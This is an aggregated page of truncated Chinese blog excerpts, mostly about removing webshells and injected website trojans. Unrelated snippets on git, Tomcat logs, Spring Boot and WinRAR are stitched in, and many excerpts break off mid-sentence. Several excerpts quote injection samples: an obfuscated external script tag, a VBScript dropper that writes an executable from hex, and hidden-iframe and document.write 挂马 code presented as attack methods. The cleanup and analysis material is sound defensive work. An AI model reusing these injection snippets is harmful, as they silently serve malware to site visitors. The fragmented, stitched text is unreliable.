Webshell清除-解决驱动级文件隐藏挂马…

案例:某公司一个lamp的服务器网站站点目录下所有文件均被植入了广告脚本如下内容: <script language=javascriptsrc=http://%4%66E%78%72%67%2E%70%6F/x.js?google_ad=93x28_ad> </script>' 包括图片文件也为植入了,网站打开时就会调用这个地址,显示一个广告,造成的用户体验很恶劣,那么如何快速处理呢. 解决方法:思路是:需要查看所有目录所有文件,把以上被植入的内容删除掉. 测试数据如下: 入侵模…

网站被入侵,担心被挂马,因此就想自己写个脚本来查找那些被挂马的文件 思路 需要实现准备一份未受感染的源代码和一份可能受感染的源代码,然后运行以下脚本,就能找出到底哪些文件被挂马了. 其中,主要是根据比对2份文件的md5值来过滤可能被挂马的文件(确切的说应该是被修改过的文件) Python脚本 __author__ = 'Flying' #coding:utf-8 #Date:2014.6.5 #检测修改过的文件 import os,sys,hashlib,datetime global_DirO…

今天写代码突然发现HTML文件最后多了一段VBscript代码: <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010…

前言 周一一早网管收到来自阿里云的一堆警告,发现我们维护的一个网站下有数十个被挂马的文件.网管直接关了vsftpd,然后把警告导出邮件给我们. 取出部分大致如下: 服务器IP/名称 木马文件路径 更新时间 木马类型 状态(全部) *.*.*.* /path/*144.gif 2017/8/7 5:53 Webshell 待处理 *.*.*.* /path/*132.jpg 2017/8/7 5:23 Webshell 待处理 *.*.*.* /path/*156.txt 2017/8/7 5:2…

当时状况 Windows Server 2008 R2 Enterprise + 帝国CMS6.6 + MySql   server软件: Microsoft-IIS/7.5 操作系统: WINNT PHP版本号: 5.3.18 MYSQL版本号: 5.0.81-community-nt 全局变量: 关闭 (建议关闭) 魔术引用: 关闭 (建议开启) 上传文件: 能够 (最大文件:2M,表单:8M) 当前时间: 2014-05-30 14:11:57 使用域名: xxxx.com     ser…

1. 被植入木马,然后网站打开后自动弹出博彩,赌博,色情网站,一般这种病毒的特征代码如下 二.织梦CMS被挂马清理方法 1.删除增加的管理员service.spider等用户名. 2.删除根目录的asdd.90sec.service等PHP文件. 3.删除plus目录的以下可疑文件: 4.织梦程序后台扫描提示名字为90sec的PHP文件,可以在后台->模板->自定义宏标记中删除其中的条目之后可以升级下include目录里的名为dedesql.class的PHP文件即可. 5.给plus只读权限…

昨天发现 一台服务器突然慢了 top 显示 几个进程100%以上的cpu使用 执行命令为 : /tmp/php  -s /tmp/p2.conf 基本可以确定是被挂马了 下一步确定来源 last 没有登陆记录 先干掉这几个进程,但是几分钟之后又出现了 先看看这个木马想干什么吧 netstat 看到 这个木马开启了一个端口和国外的某个ip建立了连接 但是tcpdump了一小会儿 没有发现任何数据传递 这他是想干啥? 继续查看日志吧 在cron日志中发现了www用户 有一个crontab定时操作 基…

wordpress本身的安全性是非常的高的,一般不会被轻易的破解,被挂马,但是我们也不能够过度迷信wordpress的安全性,凡是连接上互联网的服务器和电脑,都存在被破解的风险性.所以我们在日常维护自己的网站时,一定要注重网站的安全性,最大限度的防止网站被挂上木马. 一般来说,破解网站的途径是获取网站后台的管理员权限,从而进行修改网站文件,放置木马,这种方式是最为常见的也是最容易防御的. 防御这种破解的方式请确保做好以下的工作:• 1. 管理员账号尽量不要使用admin这种简单的用户名,密码使用…

JS挂马攻防实录 攻现在最多见的JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行(图1),这种方法使用的关键代码如下: window.open("","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"…

最近有朋友说自己的网站平时并未作弊,文章也都是原创的,更新很稳定.可不知道为什么网站突然就被各大搜索引擎降权了,一直找不到原因.最后发现是网站被挂马了,导致网站被连累了.在此,借助马海祥博客的平台,给大家简单的介绍下js挂马的方法及如何防止网站被挂马. 一.常见JS挂马方法 现在最多见的JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行. 这种方法使用的关键代码如下: window.ope…

想法不错,放着以后应该会有用 网站挂马非常让人头痛,每次的安全措施都是治标不治本,想找到根本原因,只能去分析你的程序源代码,由于很多网站不是一个程序员开发,很多的注入漏洞很难发现,曾经通过公共文件加入过滤代码,基本无效,买了个叫龙盾的IIS防火墙,好像有点用,但最后还是被攻破了,sqlserver又被挂了. 每次注入都要用“UPDATE 表名 set 字段名= REPLACE(字段名, 网站挂马非常让人头痛,每次的安全措施都是治标不治本,想找到根本原因,只能去分析你的程序源代码,由于很多网站不是…

系统管理员通常从svn/git中检索代码,部署站点后通常首先会生成该站点所有文件的MD5值,如果上线后网站页面内容被篡改(如挂马)等,可以比对之前生成MD5值快速查找去那些文件被更改,为了使系统管理员第一时间发现,可结合crontab或nagios等工具. 程序测试如下: # python check_change.py Usage: python check_change.py update /home/wwwroot python check_change.py check /home/ww…

修改.htaccess文件 <IfModule mod_rewrite.c> Options +FollowSymlinks -Multiviews RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^(.*)$ index.php [L,E=PATH_INFO:$1]---此处与官网不同 </IfModule>…

一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script> 三:js变形加…

转载:http://blog.csdn.net/qq_21439971/article/details/54631440 今天早上五点,收到监控宝的警告短信,说是网站M无法访问了.睡的正香,再说网站所在系统是centos,重要数据每天都备份,应该很安全,也没有在意.倒头接着睡觉去了. 早上九点,机房负责人直接给我打来电话,说是全机房网络巨慢,单位的所有网站都打不开或打开的很慢.Centos服务器被挂马的一次抓马经历 我赶紧赶了过去,查看了一下那里网络,发现175服务总是以50M/S速度向外发包,…

Chrome浏览器清除页面js文件缓存 Chrome浏览器清除js缓存方法虽然简单,但有些人还是不太会,有些人会去设置里面清除有时候没有用,这里写一下简单步骤,使用一次以后就会了,而且速度更快 1.打开需清缓存的页面(如:元素编辑页面),再按F12调出开发模式框 2.勾选 Network标签下 Disable cache选项 (如果之前已勾选直接下一步) 3.按F5或右键"重新加载"刷新页面内容 (刷新页面后本页面相关js缓存已清除) 4.页面重新加载完成再按F12隐藏开发模式框就ok…

织梦dedecms是新手站长使用得比较多的一个建站开源程序,正因如此,也是被被入侵挂马比较多的程序.下面就来跟大家说一下怎么重新命名dedecms的include文件夹以及plus文件夹来提高网站的安全性,减少被黑客软件扫描到漏洞的概率. dedecms的漏洞主要集中在data.include.plus.dede.member几个文件夹中的php文件里,对于data这个文件夹我们可以把它移到网站的根目录外,dede可以冲命名,member可以删掉,一般用不着,special专题功能 instal…

一.织梦CMS被挂马特征汇总 2013织梦CMS被挂马特征汇总.最近很多朋友反应后台多了几个系统管理员用户:service.spider等,而且自己之前的管理员用户登陆时候会提示用户名不存在.还有朋友的织梦CMS网站里出现asdd.90sec.service等PHP格式的非DedeCMS源文件,这些木马文件内容一般为 等等,被挂马后网站根目录下会生成一堆赌博网页等. 二.织梦CMS被挂马清理方法 1.删除增加的管理员service.spider等用户名. 2.删除根目录的asdd.90sec.s…

使用NB Exploit Kit攻击的APT样本分析 from:https://cloud.tencent.com/developer/article/1092136 1.起因 近期,安恒工程师在某网络中部署的APT威胁分析设备中发现一条高危告警,该告警包含了较多可疑行为,包含在沙箱运行环境中进行增加自启动.创建网络套接字连接.读取网络文件.收集磁盘信息.获取当前用户名信息等敏感内容,并通过对原始报文分析发现该样本的下载链接也存在较大的可疑性,经过对告警内容的初步分析,基本可以推测可能是一种网页…

又经历了一次dedecms被挂马排毒的过程,排毒过程在这里跟大家分享一下. 挂马之后,网站的表现形式: 直接访问网站没有任何问题,从百度搜索的关键词访问网站,就跳转到另外一个网站. 根据我原来的排毒经验:很可能是有人在php里面写入了判断来路的代码,如果是经过百度来的,就跳转到另外一个网站,如果不是,就可以访问. 不过检查了一下php代码,没有发现任何问题. 从百度关键词访问过来的话,能够看到本网站的title,只是一闪而过,就跳转了.根据这个现象判断,马应该是在js里面.于是下载网站模板文件,…

实验目的 了解Flash木马的原理和危害 实现实验所提到的命令和工具,得到实验结果 实验原理 利用Flash挂马的原理并模拟实现挂马 实验内容 掌握Flash挂马的原理并模拟实现挂马 实验环境描述 1.学生机与实验室网络直连 2.VPC1与实验室网络直连 3.学生机与VPC1物理链路连通 实验步骤 1.学生单击开始实验,进入实验场景. 2.学生输入账号xp ,密码123456,登录到实验场景中的目标主机.如图所示: 3.使用IE浏览器打开素材(c:＼tools＼烟花.swf)"烟花.swf&qu…

本文章由Jack_Jia编写,转载请注明出处.   文章链接: http://blog.csdn.net/jiazhijun/article/details/11131891 作者:Jack_Jia    邮箱: 309zhijun@163.com 一.漏洞描述 近期,微信等多款安卓流行应用曝出高危挂马漏洞:只要点击好友消息或朋友圈中的一条网址,手机就会自动执行黑客指令,出现被安装恶意扣费软件.向好友发送欺诈短信.通讯录和短信被窃取等严重后果.在乌云漏洞平台上,包括安卓版微信.QQ.腾讯微博.Q…

#! /bin/bash d=`date +%F` exec >> /mydata/script/logs/$d>& echo "开始执行清除tomcat日志文件" find /titakid/tomcat7/logs/ -mtime + -name "*.out" -exec rm -rf {} \; ]; then echo "清除日志成功" else echo "清除日志失败" fi #! /b…

Springboot解决资源文件404,503等特殊报错 原文链接:https://www.cnblogs.com/blog5277/p/9324609.html 原文作者:博客园--曲高终和寡 *******************如果你看到这一行,说明爬虫在本人还没有发布完成的时候就抓走了我的文章,导致内容不完整,请去上述的原文链接查看原文**************** 注: 其实这种情况是极少数遇到的,全网(百度+谷歌)几乎没有搜到解决办法, 搜到的大多数是因为修改了Springboot…

附件经常会是一系列的压缩文件,下载是默认文件名是一个随机数字.因而下载完会出现压缩文件解压缩失败解决方法:下载时重命名为带一定顺序的文件名,如文件1,文件2,文件3等 如何解决单个文件解压失败?论坛中的许多资料都是使用RAR压缩的,上传到下载,在解压过程中可能会出现错误.一般出现最多的是“CRC”错误,就是在解压末端出现了错误.主要的原因是:1.源文件就有压缩的错误:2. 下载的时候由于线程太多,在收尾的时候出现了错误:3.下载没有完全. 解决的办法:一.修复. 1.首先打开WinRAR主窗口,…

清除git以外文件 清除git以外文件 git clean -fxd git log 查看某段时刻的log git log --until=2013-11-23 #表示查看2013年11月23日以前的log git log --since="2 days ago" --until="10 hour ago" #就表示你希望查找两天前到十小时前的log git log --until=1.minute.ago # 一分钟之前的所有 log git log --sinc…

解决创建文件时不带锁   C:\Documents and Settings\你的用户名\Application Data\Subversion   找到上面的用户路径 打开config添加 ### Section for configuring automatic properties. [auto-props] * = svn:needs-lock   然后开启提示 找到这行代码 将注释符号#去掉 # enable-auto-props = yes…

一.NtQueryDirectoryFile函数功能(NT系列函数) NtQueryDirectoryFile函数:在一个给定的文件句柄,该函数返回该文件句柄指定目录下的不同文件的各种信息. 根据传入的文件句柄参数fileHandle,返回句柄所表示的目录中的不同文件的信息. NTSTATUS ZwQueryDirectoryFile( _In_      HANDLE FileHandle, _In_opt_  HANDLE Event, _In_opt_  PIO_APC_ROUTINE A…

转自:https://blog.csdn.net/HaHa_Sir/article/details/79131607 解决springMVC文件上传报错: The current request is not a multipart request 一.问题描述在使用springMVC做文件上传时,点击"导入" 时页面报错:org.springframework.web.multipart.MultipartException: The current request is not a…